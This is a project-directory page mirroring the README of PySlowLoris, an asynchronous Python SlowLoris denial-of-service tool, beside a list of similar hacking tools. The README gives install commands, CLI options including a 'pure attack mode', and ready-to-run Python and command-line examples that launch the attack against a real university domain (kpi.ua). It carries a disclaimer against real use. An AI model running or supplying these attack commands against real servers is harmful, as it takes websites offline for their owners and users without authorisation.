GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → maxkrivich → Slowloris

maxkrivich / Slowloris

Licence: mit
Asynchronous Python implementation of SlowLoris DoS attack

Programming Languages

python
139335 projects - #7 most used programming language
python3
1442 projects

Labels

securityhackingexploitcybersecurityhacking-toolvulnerabilityapacheinformation-securitydos

Projects that are alternatives of or similar to Slowloris

A Red Teamer Diaries
RedTeam/Pentest notes and experiments tested on several infrastructures related to professional engagements.
Stars: ✭ 382 (+649.02%)
Mutual labels:  hacking, exploit, cybersecurity, vulnerability
Hack Tools
hack tools
Stars: ✭ 488 (+856.86%)
Mutual labels:  hacking, exploit, hacking-tool, vulnerability
H4cker
This repository is primarily maintained by Omar Santos and includes thousands of resources related to ethical hacking / penetration testing, digital forensics and incident response (DFIR), vulnerability research, exploit development, reverse engineering, and more.
Stars: ✭ 10,451 (+20392.16%)
Mutual labels:  hacking, exploit, cybersecurity, vulnerability
V3n0m Scanner
Popular Pentesting scanner in Python3.6 for SQLi/XSS/LFI/RFI and other Vulns
Stars: ✭ 847 (+1560.78%)
Mutual labels:  hacking, exploit, vulnerability
awesome-ddos-tools
Collection of several DDos tools.
Stars: ✭ 75 (+47.06%)
Mutual labels:  dos, cybersecurity, hacking-tool
phomber
Phomber is infomation grathering tool that reverse search phone numbers and get their details, written in python3.
Stars: ✭ 59 (+15.69%)
Mutual labels:  cybersecurity, information-security, hacking-tool
Cheatsheet God
Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet
Stars: ✭ 3,521 (+6803.92%)
Mutual labels:  hacking, hacking-tool, information-security
Xxe Injection Payload List
🎯 XML External Entity (XXE) Injection Payload List
Stars: ✭ 304 (+496.08%)
Mutual labels:  hacking, cybersecurity, information-security
Vulnx
vulnx 🕷️ is an intelligent bot auto shell injector that detect vulnerabilities in multiple types of cms { `wordpress , joomla , drupal , prestashop .. `}
Stars: ✭ 1,009 (+1878.43%)
Mutual labels:  hacking, hacking-tool, vulnerability
Search That Hash
🔎Searches Hash APIs to crack your hash quickly🔎 If hash is not found, automatically pipes into HashCat⚡
Stars: ✭ 466 (+813.73%)
Mutual labels:  hacking, cybersecurity, hacking-tool
Thc Archive
All releases of the security research group (a.k.a. hackers) The Hacker's Choice
Stars: ✭ 474 (+829.41%)
Mutual labels:  hacking, exploit, hacking-tool
Xattacker
X Attacker Tool ☣ Website Vulnerability Scanner & Auto Exploiter
Stars: ✭ 897 (+1658.82%)
Mutual labels:  hacking, exploit, hacking-tool
reosploit
A Tool that Finds, Enumerates, and Exploits Reolink Cameras.
Stars: ✭ 89 (+74.51%)
Mutual labels:  exploit, cybersecurity, hacking-tool
Android Exploits
A collection of android Exploits and Hacks
Stars: ✭ 290 (+468.63%)
Mutual labels:  dos, hacking, exploit
Icg Autoexploiterbot
Wordpress 🔥 Joomla 🔥 Drupal 🔥 OsCommerce 🔥 Prestashop 🔥 Opencart 🔥
Stars: ✭ 242 (+374.51%)
Mutual labels:  hacking, exploit, hacking-tool
Mouse
Mouse Framework is an iOS and macOS post-exploitation framework that gives you a command line session with extra functionality between you and a target machine using only a simple Mouse payload. Mouse gives you the power and convenience of uploading and downloading files, tab completion, taking pictures, location tracking, shell command execution, escalating privileges, password retrieval, and much more.
Stars: ✭ 186 (+264.71%)
Mutual labels:  hacking, exploit, hacking-tool
Keylogger
Get Keyboard,Mouse,ScreenShot,Microphone Inputs from Target Computer and Send to your Mail.
Stars: ✭ 604 (+1084.31%)
Mutual labels:  hacking, cybersecurity, hacking-tool
Oxidtools
200 TOOLS BY 0XID4FF0X FOR TERMUX
Stars: ✭ 143 (+180.39%)
Mutual labels:  hacking, exploit, hacking-tool
Zeebsploit
web scanner - exploitation - information gathering
Stars: ✭ 159 (+211.76%)
Mutual labels:  hacking, hacking-tool, vulnerability
Hacking
hacker, ready for more of our story ! 🚀
Stars: ✭ 413 (+709.8%)
Mutual labels:  hacking, hacking-tool, vulnerability
View All Similar Projects ➔

PySlowLoris

Gitter chat License Python Build Status PyPI version

PySlowLoris is a tool for testing if your web server is vulnerable to slow-requests kind of attacks. The module is based on python-trio for Asynchronous I/O and poetry for dependency management. The idea behind this approach to create as many connections with a server as possible and keep them alive and send trash headers through the connection. Please DO NOT use this in the real attacks on the servers.

More information about the attack you can find here.

Installation

PyPi

For installation through the PyPI:

$ pip install pyslowloris==2.0.1

This method is prefered for installation of the most recent stable release.

Source-code

For installation through the source-code for local development:

$ git clone https://github.com/[username]/SlowLoris.git
$ cd SlowLoris
$ pip install poetry
$ pyenv install 3.8.3
$ pyenv local 3.8.3
$ poetry env use 3.8.3

Basic Usage

Available command list:

$ slowloris --help
usage: slowloris [-h] -u URL [-c CONNECTION_COUNT] [-s]

Asynchronous Python implementation of SlowLoris attack

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Link to a web server (http://google.com) - str
  -c CONNECTION_COUNT, --connection-count CONNECTION_COUNT
                        Count of active connections (default value is 247) - int
  -s, --silent          Ignore all of the errors [pure attack mode] - bool

Docker usage

Download image from Docker Hub

Pull the image from Docker Hub and run a container:

$ docker pull maxkrivich/pyslowloris
$ docker run --rm -it maxkrivich/pyslowloris [-h] [-u URL] [-c CONNECTION_COUNT] [-s SILENT]

Build image from source-code

Also you can build image from Dockerfile and run a container:

$ docker build -t pyslowloris .
$ docker run --rm -it pyslowloris [-h] [-u URL] [-c CONNECTION_COUNT] [-s SILENT]

Note: Don't forget about 'sudo'!

Example of usage

How to use module through Python API

Here is an example of usage

from pyslowloris import HostAddress, SlowLorisAttack

url = HostAddress.from_url("http://kpi.ua")
connections_count = 100

loris = SlowLorisAttack(url, connections_count, silent=True)
loris.start()

How to use module via CLI

The following command helps to use module from command line

$ slowloris -u http://kpi.ua/ -c 100 -s
stop execution: Ctrl + C

Testing

Testing with real apache server

$ docker-compose up web_server -d
$ .....

Module-tests

$ make pytest

Bugs, issues and contributing

If you find bugs or have suggestions about improving the module, don't hesitate to contact me.

License

This project is licensed under the MIT License - see the LICENSE file for details

Copyright (c) 2017-2020 Maxim Krivich

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].